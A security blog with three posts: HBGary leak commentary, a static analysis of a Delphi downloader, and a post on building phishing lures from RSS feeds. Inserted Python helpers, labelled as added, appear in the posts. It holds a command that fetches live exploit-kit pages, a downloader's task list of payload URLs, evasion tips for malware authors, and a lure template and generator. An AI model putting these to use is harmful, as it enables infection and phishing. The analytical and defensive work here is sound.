No doubt you have heard about Anonymous hacking HBGary and leaking their emails.
The media had a field day: "security company gets hacked", "Black ops: how HBGary wrote backdoors for the government", etc.
HBGary got pwned, but shit happens, right? It's probably not worth thinking about all the successful hacks against companies such as Micro$oft and Google which are not made public... and what's with the big fuss about writing backdoors for the government??? We are in the age of cyberwar; I bet plenty of defense and security companies are doing the same (Stuxnet, anybody?).
Anyway, to the point of this post:
One of the BIG things I am surprised has not been reported on more is all the email reports and investigations on APT. A number of the emails are about in-depth APT investigations, and there are also emails about specific APT/malware variants and how the HBGary tools detect them.
No doubt the APT 'attackers' have read the HBG emails and have probably dramatically changed tactics, and likely moved to entirely new malware variants. There was one specific HBG customer, who I will refer to as 'QQ', who appears to have had an ongoing APT infection for a long time. Reading the emails, it would appear a lot of data was stolen (how much that data is worth in real money I don't know, potentially millions), and now their entire investigation has been published on the Internet. It is going to cost them millions more in remediation, let alone the negative image it may have with their customers.
Fortunately none of the HBG apps' source code was leaked; if it had been, AV companies would be in for a hard time, as I believe this would give APT authors a great advantage in staying undetected.
D3ADLiN3
Monday, 21 February 2011
Friday, 14 May 2010
Offline Malware Analysis
In this article I am going to write about static/offline analysis of malware (without actually running or debugging it).
From looking at the strings in a piece of malware it is quite often easy to work out what it is designed to do.
To find some live malware samples, I am going to pull a list of known drive-by download sites from malwareurl.com. This dumps the URLs to a file:
D3ADLiN3@box:~# links2 -dump http://www.malwareurl.com/search.php?domain=\&s=exploits\&match=0\&rp=100\&urls=on\&redirs=on\&ip=on\&reverse=on\&as=on | awk '{print $1}' | sed 's/|//' | egrep "[A-Za-z0-9\/]" | awk '{print "http://"$1}' >> MalURLS.txt
Now I use wget to fetch the pages. wget only downloads; it never renders or executes anything, so this is safe on a Linux analysis box as long as the downloaded files are never opened on a Windows host. I spoof the User-Agent so I don't get blacklisted by the exploit kits, and by using an IE6 User-Agent I hopefully trigger more attacks, since the kits fingerprint the browser and only serve payloads to targets they have exploits for.
D3ADLiN3@box:~# wget -i MalURLS.txt -T 1 -t 3 --user-agent="Mozilla/4.0 (MSIE 6.0; Windows NT 5.1)"
Once wget has finished downloading, there are a variety of HTML pages and executables left over.
I have picked a random executable from the download, called 1009.exe.
Now let's take a look at the file:
D3ADLiN3@box:~# packer.py 1009.exe
-> Nothing Found
D3ADLiN3@box:~# yara rules 1009.exe
-> Delphi
D3ADLiN3@box:~# clamscan 1009.exe
1009.exe: Trojan.Killav-157 FOUND
OK, so AV detects the file as an anti-virus killer, the packer scan finds no known packer signature, and the YARA match says it was written in Delphi.
Opening the file in a hex editor, I can confirm the file is not crypted or packed, because all the strings within the file are clearly visible and not obfuscated in any way.
So let's dump all the strings out of the file:
D3ADLiN3@box:~# strings 1009.exe > strings_1009.exe
Now a couple of things jump out straight away: Av Love Av Av Av Av Av, bluedragonfly, U_GuiHack360, KillAv, upmyself.
A quick Google on some of these comes up with some obvious results:
"U_GuiHack360" appears to be a method to kill the Norton 360 AV/Firewall GUI.
"Av Love Av Av Av Av Av" links to a website about Malware.
There is a list of different AV executables, most probably for process killing.
There are references to Registry Keys:
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
These keys control whether Windows Explorer shows hidden files: Hidden under Advanced is the current per-user setting, and SHOWALL under Folder\Hidden defines the "Show hidden files and folders" option itself. Malware commonly rewrites them (for example setting the CheckedValue under SHOWALL to 0) so that its hidden dropped files stay invisible even when the user tells Explorer to show hidden files.
We also find references to what appear to be the startup (persistence) methods. Note that RunServices only exists on Windows 9x/ME and is ignored on NT-based Windows, a hint that this is old or generic persistence code:
Software\Microsoft\Windows\CurrentVersion\policies
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\runonce
software\microsoft\windows\currentversion\runonceex
software\microsoft\windows\currentversion\runservices
The malware author also seems to be using the "Image File Execution Options" debugger mechanism to kill AV (or possibly as a startup method):
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
This lesser-known registry key exists for debugging: when a process whose image name matches a subkey is started, Windows instead launches the program named in that subkey's Debugger value, appending the original command line, and the debugger is expected to start the real application itself.
So for example, if you wanted to debug notepad.exe with OllyDbg, you would create a notepad.exe subkey under that key and set its Debugger value to the path of OllyDbg.
Starting notepad.exe would then launch OllyDbg, which loads notepad.exe.
If the "debugger" you configure does not relaunch the target, only the debugger runs. So if you changed the OllyDbg path to calc.exe, each time you tried to start notepad.exe, calc.exe would launch instead.
This can be used by malware in two ways:
1) Hijack an existing program that Windows starts automatically (e.g. a built-in component such as Windows Update) and use it as a startup method: the malware's own executable becomes the "debugger" and runs every time the legitimate binary is launched.
2) Hijack a legitimate process and have something useless start instead. For example, the malware could add a subkey for each anti-virus executable and set svchost.exe as its "debugger". The AV process never starts; a bare svchost.exe is launched in its place and does nothing.
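As an added example (not code from the post), here is the check an analyst can run over a `reg export` of the IFEO key to find exactly the two abuse patterns above. The .reg text, the image names (wuauclt.exe, ekrn.exe) and the paths in it are constructed for illustration; the lists of known debuggers and "sink" binaries are assumptions to tune per environment.

```python
"""Find Image File Execution Options (IFEO) Debugger hijacks in a .reg export.

Added example, not code from the original post. Input is text in the format
produced by exporting the IFEO key with reg.exe; SAMPLE_REG below is
constructed, and the image names and paths in it are made up.
"""
import re
from typing import Dict, List, Tuple

IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
               r"\Image File Execution Options")

# Assumption: debuggers an analyst expects to see here; tune per environment.
KNOWN_DEBUGGERS = {"ollydbg.exe", "windbg.exe", "vsjitdebugger.exe", "devenv.exe"}
# Assumption: system binaries malware points AV images at so that nothing useful runs.
SYSTEM_SINKS = {"svchost.exe", "rundll32.exe", "cmd.exe"}

# Constructed export: one real debugger entry plus the two abuse patterns from the post
# (a Windows component redirected to a dropped file, an AV image redirected to svchost.exe).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\OllyDbg\\OLLYDBG.EXE"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauclt.exe]
"Debugger"="C:\\Windows\\Temp\\1009.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe]
"Debugger"="svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"GlobalFlag"=dword:00000002
"""

_KEY_RE = re.compile(r"^\[(.+)\]$")
_DEBUGGER_RE = re.compile(r'^"Debugger"="(.*)"$', re.IGNORECASE)


def _unescape(value: str) -> str:
    """Undo .reg REG_SZ escaping (doubled backslashes, escaped quotes)."""
    return value.replace('\\"', '"').replace("\\\\", "\\")


def parse_ifeo(reg_text: str) -> Dict[str, str]:
    """Map image name -> Debugger command for every direct IFEO subkey that sets one."""
    found: Dict[str, str] = {}
    image = None
    prefix = IFEO_PREFIX.lower() + "\\"
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = _KEY_RE.match(line)
        if key:
            image = None
            name = key.group(1)
            if name.lower().startswith(prefix):
                rest = name[len(prefix):]
                if "\\" not in rest:  # direct child such as ...\notepad.exe, not PerfOptions etc.
                    image = rest.lower()
            continue
        dbg = _DEBUGGER_RE.match(line)
        if dbg and image is not None:
            found[image] = _unescape(dbg.group(1))
    return found


def _exe_name(command: str) -> str:
    """Executable file name from a Debugger command line (first token, possibly quoted)."""
    command = command.strip()
    if not command:
        return ""
    first = command[1:].split('"', 1)[0] if command.startswith('"') else command.split()[0]
    return first.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(entries: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Label entries: 'debugger' (expected tool), 'av-kill' (image swallowed by a system
    binary that never relaunches it) or 'persistence' (image redirected to a foreign binary).
    The registry alone does not prove intent; the labels mirror the two patterns in the post."""
    report: List[Tuple[str, str, str]] = []
    for image, command in sorted(entries.items()):
        exe = _exe_name(command)
        if exe in KNOWN_DEBUGGERS:
            verdict = "debugger"
        elif exe in SYSTEM_SINKS:
            verdict = "av-kill"
        else:
            verdict = "persistence"
        report.append((image, command, verdict))
    return report


if __name__ == "__main__":
    for image, command, verdict in classify(parse_ifeo(SAMPLE_REG)):
        print(f"{verdict:12} {image:20} -> {command}")
```

Anything other than a known debugger is worth a look; a Debugger value on a security product's image name that points at a Windows binary is almost never legitimate, and a Debugger value pointing into a temp or user-writable directory is the persistence variant.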
We also find a reference to "SeDebugPrivilege", which the malware would enable to open and terminate AV processes it otherwise could not touch, or for process injection.
There are references to the following strings: FireWall, Virus, Anti, NOD32, Sniffer, DeBug.
I would suggest this is most probably used as a generic 'anti-anti': enumerating windows and closing any whose title contains one of these strings.
We can also see what I believe are the Delphi units (modules) used in the file: bluedragonfly, U_GuiHack360, 3Messages, KWindows, UTypes, SysInit, System, KillAv, SysUtils, ImageHlp, SysConst, process, GetIp, ?WinInet, WinSock, HardwareInfo, 0Nb30, anti, upmyself, Jencrypt, @other, TlHelp32.
There are also some URLs in the file:
http://www.xxx.cn/Count.asp
http://121.11.81.46:88/haozi.txt
Going back into the hex editor, I search for xxx.cn and find some other interesting strings next to it: "?mac=" and "&ver=Test&os=Windows". The fact that they sit as separate fragments suggests the request URL is assembled at runtime. To me, this looks like a tracking system, probably to count infections: the sample reports the host's MAC address, a build/version tag and the OS to Count.asp.
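The string hunt above, as an added example that is not code from the post: it automates the `strings` pass with two things a practitioner wants, UTF-16LE strings (GNU `strings` prints only ASCII unless run with `-el`, and Delphi and Win32 API paths are often wide) and automatic bucketing of the hits into persistence keys, IFEO, URLs, privileges and AV markers. SAMPLE is a constructed byte blob built from indicators quoted on this page, not 1009.exe; the bucket rules and the minimum string length are assumptions.

```python
"""String triage of an unpacked Windows binary.

Added example, not code from the original post. SAMPLE is a constructed blob
built from indicators quoted in the post; it is not the analysed sample.
"""
import re
from typing import Dict, List

MIN_LEN = 5  # assumption: GNU strings' default of 4 is too noisy for triage

# Constructed stand-in for a PE section: strings from the post, padded with junk bytes.
# The last indicator is stored as UTF-16LE, which plain `strings` would miss.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    + b"software\\microsoft\\windows\\currentversion\\run\x00"
    + b"\x01\x02\x03"
    + b"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\x00"
    + b"http://www.xxx.cn/Count.asp?mac=\x00&ver=Test&os=Windows\x00"
    + b"http://121.11.81.46:88/haozi.txt\x00"
    + b"SeDebugPrivilege\x00KillAv\x00NOD32\x00\x00\x00"
    + "U_GuiHack360".encode("utf-16-le") + b"\x00\x00"
    + b"\xff\xfe\xfd"
)


def ascii_strings(data: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Printable ASCII runs, like `strings -n MIN_LEN`."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pat.finditer(data)]


def wide_strings(data: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Printable UTF-16LE runs, like `strings -el`."""
    pat = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [m.group().decode("utf-16-le") for m in pat.finditer(data)]


def extract_strings(data: bytes) -> List[str]:
    return ascii_strings(data) + wide_strings(data)


# Order matters: the first matching bucket wins. Assumed rules, extend per case.
BUCKETS = [
    ("persistence_key", re.compile(r"currentversion\\(run|runonce|runonceex|runservices|policies)\b", re.I)),
    ("ifeo_key", re.compile(r"image file execution options", re.I)),
    ("url", re.compile(r"^https?://", re.I)),
    ("privilege", re.compile(r"^Se[A-Z][A-Za-z]*Privilege$")),
    ("av_marker", re.compile(r"killav|guihack360|nod32|norton|firewall|sniffer|antivirus", re.I)),
]


def triage(data: bytes) -> Dict[str, List[str]]:
    """Bucket every extracted string by the first indicator rule it matches."""
    out: Dict[str, List[str]] = {name: [] for name, _ in BUCKETS}
    out["other"] = []
    for s in extract_strings(data):
        for name, rx in BUCKETS:
            if rx.search(s):
                out[name].append(s)
                break
        else:
            out["other"].append(s)
    return out


if __name__ == "__main__":
    for bucket, hits in triage(SAMPLE).items():
        for hit in hits:
            print(f"{bucket:16} {hit}")
```

The "other" bucket is where the interesting leftovers land (here the "&ver=Test&os=Windows" beacon fragment), so it is worth reading in full rather than discarded; a strings pass that only looks at matched rules misses exactly the kind of clue the hex editor turned up above.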
Looking at the next URL in the file, I downloaded haozi.txt and opened it up:
http://121.11.81.46:88/1005.exe 105.exe
http://121.11.81.46:88/han.exe han.exe
http://121.11.81.46:88/dog1.exe dog1.exe
http://121.11.81.46:88/dog2.exe dog2.exe
http://121.11.81.46:88/dogarp.exe
This appears to be a "task list" for an intelligent downloader. What's the difference between an intelligent downloader and a regular downloader? A regular downloader normally has its payload URLs hard-coded; an intelligent downloader fetches a task list from a URL and downloads whatever it lists (in this case five other binaries). The benefit for the malware author is that the payload locations can be changed at any time without rebuilding or redistributing the downloader, so it keeps working a lot longer than a regular downloader (as long as the task-list URL stays up). The same property helps the analyst: the task list is a live feed of what the operator is pushing, and polling it over time shows payload changes without touching the downloader again.
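A parser for that task-list format, as an added example that is not the post's own code. TASKLIST_V1 is the haozi.txt content shown above; TASKLIST_V2 is a constructed later poll (the dog3.exe entry is made up) used only to show how two polls are diffed. The format rules (one task per line, optional second token as the saved file name) are inferred from the listing and are an assumption.

```python
"""Parse an intelligent-downloader task list (the haozi.txt format above) and diff two polls.

Added example, not the post's own code. TASKLIST_V1 is the content shown above;
TASKLIST_V2 is a constructed later poll (dog3.exe is made up) used only for the diff.
"""
from typing import Dict, List, NamedTuple, Set, Tuple
from urllib.parse import urlsplit


class Task(NamedTuple):
    url: str         # where the downloader fetches the payload
    local_name: str  # file name it is saved under on the victim


TASKLIST_V1 = """\
http://121.11.81.46:88/1005.exe 105.exe
http://121.11.81.46:88/han.exe han.exe
http://121.11.81.46:88/dog1.exe dog1.exe
http://121.11.81.46:88/dog2.exe dog2.exe
http://121.11.81.46:88/dogarp.exe
"""

TASKLIST_V2 = """\
http://121.11.81.46:88/1005.exe 105.exe
http://121.11.81.46:88/han.exe han.exe
http://121.11.81.46:88/dog3.exe dog3.exe
http://121.11.81.46:88/dog2.exe dog2.exe
http://121.11.81.46:88/dogarp.exe
"""


def parse_task_list(text: str) -> List[Task]:
    """One task per non-empty line: '<url> [<local name>]'. A missing local name
    defaults to the URL basename (the last line above has none). Non-HTTP URLs are rejected."""
    tasks: List[Task] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts:
            continue
        url = parts[0]
        split = urlsplit(url)
        if split.scheme not in ("http", "https") or not split.netloc:
            raise ValueError(f"line {lineno}: not a download URL: {url!r}")
        local_name = parts[1] if len(parts) > 1 else split.path.rsplit("/", 1)[-1]
        if not local_name:
            raise ValueError(f"line {lineno}: cannot derive a file name from {url!r}")
        tasks.append(Task(url, local_name))
    return tasks


def is_valid_task_list(text: str) -> bool:
    try:
        parse_task_list(text)
        return True
    except ValueError:
        return False


def iocs(tasks: List[Task]) -> Dict[str, List[str]]:
    """Indicators to block or hunt for: hosts (with port), payload URLs, dropped file names."""
    return {
        "hosts": sorted({urlsplit(t.url).netloc for t in tasks}),
        "urls": [t.url for t in tasks],
        "dropped_files": sorted({t.local_name for t in tasks}),
    }


def diff_polls(old: List[Task], new: List[Task]) -> Tuple[Set[str], Set[str]]:
    """URLs the operator added and removed between two fetches of the task list."""
    old_urls = {t.url for t in old}
    new_urls = {t.url for t in new}
    return new_urls - old_urls, old_urls - new_urls


if __name__ == "__main__":
    v1 = parse_task_list(TASKLIST_V1)
    print(iocs(v1))
    print(diff_polls(v1, parse_task_list(TASKLIST_V2)))
```

Note that the saved name can differ from the URL basename (1005.exe lands as 105.exe), so host-side hunting has to use the dropped file names, not the URL names.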
So let's download and scan the files:
D3ADLiN3@box:~# clamscan *.exe
1005.exe: OK
dog1.exe: OK
dog2.exe: Trojan.Downloader-13207 FOUND
dogarp.exe: Trojan.Agent-16390 FOUND
han.exe: OK
D3ADLiN3@box:~# packer.py 1005.exe
-> Nothing Found
D3ADLiN3@box:~# packer.py dog1.exe
-> ['UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser']
D3ADLiN3@box:~# packer.py dog2.exe
-> ['TASM / MASM']
D3ADLiN3@box:~# packer.py dogarp.exe
-> Nothing Found
D3ADLiN3@box:~# packer.py han.exe
-> ['Microsoft Visual C++']
D3ADLiN3@box:~# yara rules 1005.exe
-> Armadillo
D3ADLiN3@box:~# yara rules dog1.exe
-> UPX
D3ADLiN3@box:~# yara rules dog2.exe
-> Nothing Found
D3ADLiN3@box:~# yara rules dogarp.exe
-> DecodedIframe
D3ADLiN3@box:~# yara rules han.exe
-> Armadillo
We can see one of the files is packed with UPX. UPX is a plain compressor, not a protector, so we can unpack it with UPX itself and analyse the original file. (The Armadillo hits on 1005.exe and han.exe are a different matter: that is a commercial protector, and those would have to be dumped from memory rather than unpacked with a tool.)
D3ADLiN3@box:~# upx -d dog1.exe -o dog1_unpacked.exe
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2010
UPX 3.05        Markus Oberhumer, Laszlo Molnar & John Reiser   Apr 27th 2010

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     23552 ->     11264   47.83%    win32/pe     dog1_unpacked.exe

Unpacked 1 file.
D3ADLiN3@box:~# packer.py dog1_unpacked.exe
-> Nothing Found
D3ADLiN3@box:~# yara rules dog1_unpacked.exe
-> Nothing Found
D3ADLiN3@box:~# clamscan dog1_unpacked.exe
dog1_unpacked.exe: OK
(I'm not going to reverse these files today.)
So without even running or debugging the file, we can see a number of features of this downloader, and the further malware it is configured to download.
What did the Malware author do wrong?
The malware author made no attempt at crypting, packing or obfuscating the downloader or its settings. To make things more difficult, the author should have encrypted the registry keys, process names and URLs, obfuscated the unit names, encrypted the task list, and crypted and/or packed the executable. The flip side for defenders: once that is done, string triage alone no longer recovers these indicators, and the sample has to be unpacked or run in a sandbox to get the same picture.
Friday, 1 May 2009
Dynamic Social Engineering Spreading
So what is 'Dynamic Social Engineering Spreading'?
It is simply social engineering, but with dynamic content. The main use of this would be spreading via email, IM, etc.
So how do we get our dynamic content? Simple: RSS feeds.
This is also where our social engineering techniques come into play:
We use popular RSS feeds on topics such as news, sports, etc.
Take the BBC: the BBC has an RSS feed which is updated regularly with new content, which gives us constant fresh data to work with. The fact that it is XML makes it very easy to parse the content and manipulate it to our needs.
Using the news gives us the social engineering edge: the victim is more likely to accept something they have already read or heard about on TV, in the newspaper, etc.
IM Example:
Template:
Hey you heard about *NEWS SUBJECT* ?
*NEWS CONTENT*
Look at this *LINK/ZIP*
With real data (taken from the BBC News RSS feed):
Hey you heard about Venezuela army helicopter crashes ?
A military helicopter has crashed in Venezuela killing at least 18 people on board, President Hugo Chavez says.
Look at this http://www.badguy.com/evilwebpage.htm
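The feed-to-template step described above, as an added example that is not the post's own code, together with the matching defender-side check: the technique's fingerprint is a verbatim copy of a current feed description plus a link, which is something an IM or mail gateway can test for. SAMPLE_FEED is a constructed RSS 2.0 snippet (the first item is the BBC headline quoted above, the second is made up), and the link is the placeholder URL from the post.

```python
"""RSS-driven lure generation as described above, plus the matching defender-side check.

Added example, not the post's own code. SAMPLE_FEED is a constructed RSS 2.0 snippet
(first item from the post, second made up); the link is the post's placeholder URL.
"""
import re
import xml.etree.ElementTree as ET
from typing import List, NamedTuple


class Item(NamedTuple):
    title: str
    description: str


# The IM template from the post.
TEMPLATE = "Hey you heard about {title} ?\n{description}\nLook at this {link}"

SAMPLE_FEED = """<rss version="2.0"><channel>
<title>News feed (constructed sample)</title>
<item>
<title>Venezuela army helicopter crashes</title>
<description>A military helicopter has crashed in Venezuela killing at least 18 people on board, President Hugo Chavez says.</description>
</item>
<item>
<title>Example sports headline (constructed)</title>
<description>Constructed description of a second story.</description>
</item>
</channel></rss>"""

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_feed(xml_text: str) -> List[Item]:
    """Title/description pairs from an RSS 2.0 document; items missing either are skipped."""
    root = ET.fromstring(xml_text)
    items: List[Item] = []
    for node in root.iter("item"):
        title = (node.findtext("title") or "").strip()
        description = (node.findtext("description") or "").strip()
        if title and description:
            items.append(Item(title, description))
    return items


def render_lure(item: Item, link: str, template: str = TEMPLATE) -> str:
    """Fill the post's IM template with one feed item and the attacker's link."""
    return template.format(title=item.title, description=item.description, link=link)


def looks_like_feed_lure(message: str, items: List[Item]) -> bool:
    """Defender side: a message that quotes a current feed description verbatim and
    carries a link matches the pattern this post describes and is worth holding."""
    if not URL_RE.search(message):
        return False
    return any(item.description in message for item in items)


if __name__ == "__main__":
    feed = parse_feed(SAMPLE_FEED)
    lure = render_lure(feed[0], "http://www.badguy.com/evilwebpage.htm")
    print(lure)
    print("flagged:", looks_like_feed_lure(lure, feed))
```

The check is only as fresh as the feed list it is given, which is also the attacker's constraint: both sides are reading the same public RSS, so the gateway should poll the same popular feeds the post suggests using.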